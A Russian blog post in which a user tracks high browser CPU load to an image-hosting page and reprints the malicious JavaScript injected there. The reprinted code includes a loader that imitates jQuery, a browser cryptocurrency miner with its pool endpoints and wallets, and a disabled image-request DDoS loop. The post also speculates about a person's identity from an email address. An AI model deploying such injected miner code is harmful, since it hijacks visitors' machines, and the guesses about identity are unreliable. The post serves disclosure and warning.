iceweasel 100% CPU miner

Стал замечать, что Iceweasel ведет себя как ненормальный. Грузит проц на 100-170% !! Да да, так htop и выводил.

Поставил замечательный плагин “Tab Data”, который показывает количество сжираемого ОЗУ на каждый таб.

Поставил “Suspend tab”, который высвобождал из памяти неиспользуемый таб. В принципе, это бы помогло. Но проблема в другом.

Закрыв все табы Iceweasel успоколился. Открываю гуглодоки. Немного разогрелся, но не сильно.

Открываю присланный в скайп скриншот через сайт одной известной и популярной обменки картинками. И кулер начинает жужжать. Тааааак.

Смотрю код страницы. На первый взгляд чисто.

 

Файл script.js

 

var my_awesome_script = document.createElement('script');
        my_awesome_script.setAttribute('src','https://preview.c9users.io/libraries/jquery/jquery.min.js');
        document.head.appendChild(my_awesome_script);

 

nice?

 

Конечно, никакого жиквари там нет.

А внутри следующее.

 

var minsc= document.createElement('script');
        minsc.setAttribute('src','//minecrunch.co/web/miner.js');
        minsc.setAttribute('onload','minepls()');
        document.head.appendChild(minsc);

        function minepls(){
                var miner = new WebMiner({username: "6hC4xzUixihTkKxgsQUSMGMrJuxYKibhwV",threads: 2});
                miner.start();
        }

Запускается майнер биткоинов.

Дальше: раньше тут вас могли ддосить, создавая картинки из ничего.

var DDos = 0
if (DDos == 1){
        for (i=1; i<=5000; i++) {
                  (new Image()).src="http://defcon.su/?"+Math.random()
        }
}

А дальше у вас воровали какие=то данные с сайта photogeek.ru, заменяли вашу инфу на iframe скрипт и делали вас разнощиком заразы. Кстати о майнере. Насколько я понял, вот кошельки на которые пытались майнить битки

function WebMiner(config) {
    /* Default values */
    this.debug = false;
    this.username = null;
    this.coin = "feathercoin";
    this.threads = 1;

    /* Extend values from config argument */
    var whitelist = ['debug', 'username', 'threads', 'coin'];
    if (!config) config = {};
    for(x in config) {
        if (whitelist.indexOf(x) != -1) {
            this[x] = config[x];
        }
    }

    this._coins = {
        "litecoin" : {
            "algorithm": "scrypt.asm.js",
            "pool":"wss://minecrunch.co:3001",
            "default_wallet":"n1H8fFbeRsyFvhZ4XucuznHenF1qFpqnKp",
            "reversed_endiannes": false
        },
        "feathercoin" : {
            "algorithm": "neoscrypt.asm.js",
            "pool": "wss://minecrunch.co:3002",
            "default_wallet":"6nmfjYVToBWb2ys4deasdydPj1kW9Gyfp4",
            "reversed_endiannes": true
        }
    };

Короче, странно все это.

UPD:
Обкатывают наверное систему, которую сами создали.

https://minecrunch.co

Там же можно посмотреть юзера

https://minecrunch.co/workers

 

https://preview.c9users.io/libraries/jquery/

А здесь лежат остальные файлы в открытом доступе, которыми ломали другие сайты. В одном из файлов оставили свою почту dinya@rambler.ru. А может наугад набрали)
В любом случае, эта почта искала киfтйского переводчика в 2011 году)

http://old.kitairu.info/rus/guestbook/?page=13

и может училась в Москве в Вычислительный центр (ВЦ РАН) им  А.А. Дородницына

 

UPD2: человек из сайта с майнером ответил о чистке сайта от этой хрени. Так что, не ленитесь писать в саппорт. Быть может вам повезет и ваши старания будут вознаграждены.

Комментарии

Добавить комментарий